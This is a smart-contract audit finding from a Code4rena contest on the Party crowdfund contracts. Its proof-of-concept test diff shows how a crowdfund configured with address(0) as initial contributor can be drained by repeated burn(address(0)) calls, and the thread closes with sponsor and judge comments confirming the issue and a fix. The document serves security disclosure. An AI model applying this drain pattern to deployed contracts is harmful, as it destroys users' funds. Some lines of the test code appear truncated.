code-423n4 / 2022-09-party-findings

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Possibility to burn all ETH in Crowdfund under some circumstances #105

Open code423n4 opened 1 year ago

code423n4 commented 1 year ago

Lines of code

Vulnerability details


If opts.initialContributor is set to address(0) (and opts.initialDelegate is not), there are two problems: 1.) If the crowdfund succeeds, the initial balance will be lost. It is still accredited to address(0), but it is not retrievable. 2.) If the crowdfund does not succeed, anyone can completely drain the contract by repeatedly calling burn with address(0). This will always succeed because CrowdfundNFT._burn can be called multiple times for address(0). Every call will cause the initial balance to be burned (transferred to address(0)).

Issue 1 is somewhat problematic, but issue 2 is very problematic, because all funds of a crowdfund are burned and an attacker can specifically set up such a deployment (and the user would not notice anything special, after all these are parameters that the protocol accepts).

Proof Of Concept

This diff illustrates scenario 2, i.e. where a malicious deployer burns all contributions (1 ETH) of contributor. He loses 0.25ETH for the attack, but this could be reduced significantly (with more burn(payable(address(0))) calls:

--- a/sol-tests/crowdfund/BuyCrowdfund.t.sol
+++ b/sol-tests/crowdfund/BuyCrowdfund.t.sol
@@ -36,9 +36,9 @@ contract BuyCrowdfundTest is Test, TestUtils {
     string defaultSymbol = 'PBID';
     uint40 defaultDuration = 60 * 60;
     uint96 defaultMaxPrice = 10e18;
-    address payable defaultSplitRecipient = payable(0);
+    address payable defaultSplitRecipient = payable(address(this));
     uint16 defaultSplitBps = 0.1e4;
-    address defaultInitialDelegate;
+    address defaultInitialDelegate = address(this);
     IGateKeeper defaultGateKeeper;
     bytes12 defaultGateKeeperId;
     Crowdfund.FixedGovernanceOpts defaultGovernanceOpts;
@@ -78,7 +78,7 @@ contract BuyCrowdfundTest is Test, TestUtils {
                     maximumPrice: defaultMaxPrice,
                     splitRecipient: defaultSplitRecipient,
                     splitBps: defaultSplitBps,
-                    initialContributor: address(this),
+                    initialContributor: address(0),
                     initialDelegate: defaultInitialDelegate,
                     gateKeeper: defaultGateKeeper,
                     gateKeeperId: defaultGateKeeperId,
@@ -111,40 +111,26 @@ contract BuyCrowdfundTest is Test, TestUtils {
     function testHappyPath() public {
         uint256 tokenId =;
         // Create a BuyCrowdfund instance.
-        BuyCrowdfund pb = _createCrowdfund(tokenId, 0);
+        BuyCrowdfund pb = _createCrowdfund(tokenId, 0.25e18);
         // Contribute and delegate.
         address payable contributor = _randomAddress();
         address delegate = _randomAddress();, 1e18);
         pb.contribute{ value: contributor.balance }(delegate, "");
-        // Buy the token.
-        vm.expectEmit(false, false, false, true);
-        emit MockPartyFactoryCreateParty(
-            address(pb),
-            address(pb),
-            _createExpectedPartyOptions(0.5e18),
-            _toERC721Array(erc721Vault.token()),
-            _toUint256Array(tokenId)
-        );
-        Party party_ =
-            payable(address(erc721Vault)),
-            0.5e18,
-            abi.encodeCall(erc721Vault.claim, (tokenId)),
-            defaultGovernanceOpts
-        );
-        assertEq(address(party), address(party_));
-        // Burn contributor's NFT, mock minting governance tokens and returning
-        // unused contribution.
-        vm.expectEmit(false, false, false, true);
-        emit MockMint(
-            address(pb),
-            contributor,
-            0.5e18,
-            delegate
-        );
-        pb.burn(contributor);
-        assertEq(contributor.balance, 0.5e18);
+        vm.warp(block.timestamp + defaultDuration + 1);
+        // The auction was not won, we can now burn all ETH from contributor...
+        assertEq(address(pb).balance, 1.25e18);
+        pb.burn(payable(address(0)));
+        assertEq(address(pb).balance, 1e18);
+        pb.burn(payable(address(0)));
+        assertEq(address(pb).balance, 0.75e18);
+        pb.burn(payable(address(0)));
+        assertEq(address(pb).balance, 0.5e18);
+        pb.burn(payable(address(0)));
+        assertEq(address(pb).balance, 0.25e18);
+        pb.burn(payable(address(0)));
+        assertEq(address(pb).balance, 0);

Recommended Mitigation Steps

Do not allow an initial contribution when opts.initialContributor is not set.

merklejerk commented 1 year ago

Excellent catch. We will implement the fix from #238 and prevent minting to address(0).

HardlyDifficult commented 1 year ago

Agree with High risk - a crowdfund's initial configuration could lead to the loss of user funds.

0xble commented 1 year ago
